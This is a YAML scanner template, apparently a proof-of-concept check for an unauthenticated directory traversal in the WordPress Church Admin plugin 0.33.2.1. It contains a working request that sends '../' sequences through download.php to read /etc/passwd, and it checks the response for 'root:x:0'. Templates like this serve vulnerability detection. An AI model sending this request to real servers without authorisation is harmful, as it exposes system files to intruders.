product: WordPress
vName: Church Admin - Unauthenticated Directory Traversal
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: 0.33.2.1
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/8997
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
